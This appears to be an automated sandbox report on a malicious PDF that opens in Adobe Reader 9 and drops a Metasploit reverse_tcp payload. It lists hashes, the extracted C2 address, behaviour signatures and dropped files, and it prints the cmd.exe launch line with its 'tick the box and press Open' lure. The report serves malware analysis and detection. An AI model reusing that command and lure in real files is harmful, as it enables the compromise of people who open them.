Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    07-09-2024 12:13

General

  • Target

    c639c49c1fa2c581f4ebd065591f6800f9c0178ad8235768be9fe640d346d471.pdf

  • Size

    58KB

  • MD5

    3adde4fdff788093d385f22601c4488e

  • SHA1

    2ec40ed80fc962ce51c7b3fbe2f9360ba806424f

  • SHA256

    c639c49c1fa2c581f4ebd065591f6800f9c0178ad8235768be9fe640d346d471

  • SHA512

    eeee1c886f4a366523284e47670dc179e95a1eaaed3738fd6e4f614beff178939abbeae04873906b2cb7fb57c48cd378880391dfe30f7893011464c80ee9dbae

  • SSDEEP

    768:TLcuNY8Dgm5XgDzsW1D4DBei8bWcYYy1ZrgtDhDUs1Nt615YNl3HkhNFksBy8DuT:TLcUj5w0W1Dz1biLsSsN8ANuFdtd6

Malware Config

Extracted

  • Family
    metasploit
  • Version
    windows/reverse_tcp
  • C2
    10.0.2.15:443

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\c639c49c1fa2c581f4ebd065591f6800f9c0178ad8235768be9fe640d346d471.pdf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\form.pdf" (cd "Desktop"))&(if exist "My Documents\form.pdf" (cd "My Documents"))&(if exist "Documents\form.pdf" (cd "Documents"))&(if exist "Escritorio\form.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\form.pdf" (cd "Mis Documentos"))&(start form.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2716
      • \??\c:\Users\Admin\Documents\form.pdf
        form.pdf
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2588

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

    Filesize

    3KB

    MD5

    0810dfdda56cfb5299be0c4842df9b24

    SHA1

    5dcd7dafada8cd186785d08fe99174cce500d6a5

    SHA256

    fc9454f39686ec5b91c36dd6bfc357f71d7eccc889ebc833a2058d58c1584f99

    SHA512

    a068053dd2faa331e79a6e2337efd7cc202c80ea74082e1f993976d6917a4ca14206fd6c6fe2fc958e82eeb92e37a233425e71a7ae2578428d1e1b1318bfea21

  • \Users\Admin\Documents\form.pdf

    Filesize

    72KB

    MD5

    081fc5f9ef8ccf9b362b48bc4d66a269

    SHA1

    aa5bd818fb2a5c9d3591658439524f40cd2cc706

    SHA256

    48c6949a16fef947addfb644d1345224e6e4cacc4ebef750be0f3f85f8bda733

    SHA512

    80bdf5e06c8443c72ec7fe9893f490869cbe67afc95aabe48300a8a4282999048a5f691936d194ff22e9e27f79778d04cddb4332f275659cfaa17a972fc2be96